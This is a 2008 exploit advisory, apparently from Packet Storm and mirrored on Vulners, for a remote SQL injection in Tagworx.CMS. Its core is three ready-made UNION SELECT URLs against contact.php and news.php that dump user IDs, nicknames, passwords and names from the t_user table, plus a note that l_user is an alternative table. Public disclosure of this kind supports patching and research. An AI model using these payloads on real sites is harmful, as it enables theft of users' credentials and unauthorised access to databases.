Lucene search

tagworx-sql.txt

🗓️ 19 May 2008 00:00:00Reported by dunType

packetstorm🔗 packetstormsecurity.com👁 16 Views

Tagworx.CMS Remote SQL Injection Vulnerability, contact.php and news.php vulnerable

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

` :::::::-. ... ::::::. :::.  
;;, `';, ;; ;;;`;;;;, `;;;  
`[[ [[[[' [[[ [[[[[. '[[  
$$, $$$$ $$$ $$$ "Y$c$$  
888_,o8P'88 .d888 888 Y88  
MMMMP"` "YmmMMMM"" MMM YM  
  
[ Discovered by dun \ dun[at]strcpy.eu ]  
  
##########################################################  
# [ TAGWORX.CMS ] Remote SQL Injection Vulnerability #  
##########################################################  
#  
# Script site: http://www.tagworx.net/  
#   
# Vuln:   
# -contact.php:  
# http://site.com/contact.php?cid=-1+UNION+SELECT+concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user--  
# or  
# http://site.com/contact.php?cid=-1+UNION+SELECT+1,2,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user--  
#   
# -news.php:   
# http://site.com/news.php?nid=-1+UNION+SELECT+1,2,3,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name)),5,6+from+t_user--  
#   
# table_name= t_user or l_user  
#  
#  
###############################################  
# Greetz: D3m0n_DE * sid_psycho * and otherz..  
###############################################  
  
[ dun / 2008 ]   
  
*******************************************************************************************  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 May 2008 00:00Current

7.4High risk

Vulners AI Score7.4